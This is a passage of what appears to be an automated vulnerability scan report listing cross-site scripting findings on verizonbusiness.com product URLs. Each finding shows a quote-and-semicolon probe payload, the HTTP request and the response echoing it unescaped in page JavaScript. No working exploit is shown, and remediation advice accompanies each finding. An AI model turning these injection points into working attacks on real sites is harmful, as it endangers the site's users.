The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47e22'%3bb496a9d0390 was submitted in the REST URL parameter 3. This input was echoed as 47e22';b496a9d0390 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/fixed-wireless47e22'%3bb496a9d0390/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:45 GMT
Content-Type: text/html
Content-Length: 43682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/fixed-wireless47e22';b496a9d0390/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.171. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2dd'%3b444cfe9fd01 was submitted in the REST URL parameter 1. This input was echoed as 5c2dd';444cfe9fd01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5c2dd'%3b444cfe9fd01/mobility/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products5c2dd';444cfe9fd01/mobility/global-communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.172. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85110"%3bb3fb83dad0d was submitted in the REST URL parameter 1. This input was echoed as 85110";b3fb83dad0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products85110"%3bb3fb83dad0d/mobility/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products85110";b3fb83dad0d/mobility/global-communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.173. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f337a"%3b109b4371e9f was submitted in the REST URL parameter 2. This input was echoed as f337a";109b4371e9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityf337a"%3b109b4371e9f/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobilityf337a";109b4371e9f/global-communications/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.174. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f668'%3bc3fa1a3bdcd was submitted in the REST URL parameter 2. This input was echoed as 2f668';c3fa1a3bdcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility2f668'%3bc3fa1a3bdcd/global-communications/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility2f668';c3fa1a3bdcd/global-communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.175. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1503b'%3bce953d2f130 was submitted in the REST URL parameter 3. This input was echoed as 1503b';ce953d2f130 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/global-communications1503b'%3bce953d2f130/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43696
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/global-communications1503b';ce953d2f130/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.176. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/global-communications/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25303"%3bf2cba4c9262 was submitted in the REST URL parameter 3. This input was echoed as 25303";f2cba4c9262 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/global-communications25303"%3bf2cba4c9262/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43694
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/global-communications25303";f2cba4c9262/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.177. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b572'%3b62c53b75e6d was submitted in the REST URL parameter 1. This input was echoed as 3b572';62c53b75e6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3b572'%3b62c53b75e6d/mobility/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:31 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products3b572';62c53b75e6d/mobility/management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.178. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f1c"%3b5469826756 was submitted in the REST URL parameter 1. This input was echoed as 12f1c";5469826756 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products12f1c"%3b5469826756/mobility/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:25 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products12f1c";5469826756/mobility/management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.179. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 646aa"%3bb00394d755e was submitted in the REST URL parameter 2. This input was echoed as 646aa";b00394d755e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility646aa"%3bb00394d755e/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:36 GMT
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility646aa";b00394d755e/management/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.180. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4bd7'%3b40c09fabac was submitted in the REST URL parameter 2. This input was echoed as d4bd7';40c09fabac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilityd4bd7'%3b40c09fabac/management/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilityd4bd7';40c09fabac/management/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.181. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 761a7'%3b4f4249f797b was submitted in the REST URL parameter 3. This input was echoed as 761a7';4f4249f797b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management761a7'%3b4f4249f797b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management761a7';4f4249f797b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.182. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb55b"%3bb85670a5f74 was submitted in the REST URL parameter 3. This input was echoed as eb55b";b85670a5f74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/managementeb55b"%3bb85670a5f74/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43672
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/managementeb55b";b85670a5f74/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.183. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

